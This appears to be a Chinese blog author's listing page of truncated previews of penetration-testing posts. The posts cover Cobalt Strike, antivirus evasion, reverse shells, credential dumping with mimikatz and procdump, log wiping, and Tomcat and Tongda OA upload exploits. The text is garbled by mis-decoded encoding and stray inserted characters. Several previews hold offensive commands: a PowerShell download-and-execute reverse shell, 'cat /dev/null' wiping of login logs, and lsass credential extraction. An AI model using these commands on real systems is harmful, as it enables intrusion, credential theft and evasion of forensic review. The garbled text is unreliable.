1泊碑、打開burp配置sock代理脖母,配置sock代理127.0.0.1 80802钳恕、打開Proxifier,配置代理;點(diǎn)擊代理服務(wù)器,添加https代理3、點(diǎn)擊代理規(guī)則议惰,新建代...
發(fā)簡(jiǎn)信
IP屬地:福建
-
-
漏洞復(fù)現(xiàn):Nostromo httpd 遠(yuǎn)程代碼執(zhí)行 CVE-2019-162781、簡(jiǎn)介: Nostromo web服務(wù)(又名nhttpd)乡恕,這是一個(gè)開源的web服務(wù)换淆,在Unix系統(tǒng)上非常流行,例如FreeBSD, OpenBSD等等 2几颜、漏洞原理: 漏...
-
powershell繞過執(zhí)行策略
執(zhí)行策略 使用命令Get-ExecutionPolicy確定當(dāng)前執(zhí)行策略Restricted腳本不能運(yùn)行 受限制的(默認(rèn)設(shè)置)Unrestricted允許所有的腳本運(yùn)行Rem...
-
cobaltstrike3.14安裝下載CS 復(fù)制到kali 賦予teamserver權(quán)限倍试,啟動(dòng)chmod +x teamserver./teamserver 192.168.111.111 password ...
-
結(jié)合veillCS shellcode免殺(2020.1.13已過期)一、CS生成shellcode 攻擊-生成后門-payload generator-選veil 二蛋哭、安裝veil 安裝docker pull mattiasohlsson/v...
-
內(nèi)網(wǎng)滲透windows 命令行開啟3389
查看RDP端口 查看端口REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Ser...
-
tomcat漏洞合集
Tomcat 5.5.28 war文件上傳漏洞 1县习、tomcat端口一般是80802、嘗試弱口令登錄tomcattomcat tomcatadmin 空口令3谆趾、新建shell...
-
linux清理入侵日志和維持權(quán)限
清除日志 1躁愿、清除登錄ssh登錄日志、安全日志沪蓬、last彤钟、lastb等cat /dev/null > /var/log/wtmpcat /dev/null > /var/lo...
-
dedecms漏洞合集dedecms 5.7后臺(tái)地址爆破 1、前提條件跷叉,存在tags.php2逸雹、使用以下腳本爆破 https://github.com/qiya7/daily-code/blob/...
-
菜刀cmd執(zhí)行命令拒絕訪問 安全模式(解決)【Err】 拒絕訪問 1营搅、出現(xiàn)以上提示可能是cmd權(quán)限不足,需要自己上傳一個(gè)cmd.exe梆砸,注意windows server不能使用win10的cmd转质,需要對(duì)應(yīng)版本2、命令行...
-
端口轉(zhuǎn)發(fā)和流量代理 ew lcx proxifier
流量代理之ew 1帖世、ew反向代理(內(nèi)網(wǎng)機(jī)器無公網(wǎng)ip需要反彈到公網(wǎng)休蟹,需要在vps監(jiān)聽)vps服務(wù)端執(zhí)行:./ew_for_linux64 -s rcsocks -l 1080...
-
反彈shell的多種姿勢(shì)
一、常用反彈命令 1日矫、powershell反彈(win7測(cè)試可以)powershell.exe IEX (New-Object Net.WebClient).Download...
-
mysql數(shù)據(jù)庫備份(脫褲)
一赂弓、環(huán)境 在獲取服務(wù)器權(quán)限之后,一般要獲取的數(shù)據(jù)除了網(wǎng)站源碼哪轿,還有數(shù)據(jù)庫文件拣展,這樣可以本地搭建相同的環(huán)境,分析出更多的漏洞或重要數(shù)據(jù) 二缔逛、常用命令 查看mysql默認(rèn)密碼gr...
-
內(nèi)網(wǎng)密碼信息收集之mimikatz
一、mimikatz結(jié)合procdump破解密碼 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPa...
-
內(nèi)網(wǎng)密碼信息收集之procdump
1姓惑、procdump 上傳procdump.exe從lsass.exe獲取密碼文件褐奴,在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已應(yīng)該還...
-
kali配置橋接模式橋接模式 虛擬機(jī)的橋接模式指的是既可以訪問外網(wǎng),同時(shí)也可以訪問局域網(wǎng)內(nèi)其他機(jī)器于毙,包括物理機(jī)本身敦冬。一般要日內(nèi)網(wǎng)同網(wǎng)段其他機(jī)器時(shí)使用 1、編輯-虛擬網(wǎng)絡(luò)編輯器-自定義添加-橋接模...
-
通達(dá)OA文件上傳漏洞0x01 fofa收集目標(biāo) title="網(wǎng)絡(luò)智能辦公管理系統(tǒng)"app="通達(dá)OA" 0x02測(cè)試是否存在上傳漏洞 訪問[ip地址:端口]/general/vmeet/wbU...
-
蟻劍 Electron XSS反彈shell復(fù)現(xiàn)一唯沮、環(huán)境 antsword2.0.5以前脖旱,antsword使用了Electron,Electron是由Github開發(fā)介蛉,用HTML萌庆,CSS和JavaScript來構(gòu)建跨平臺(tái)桌...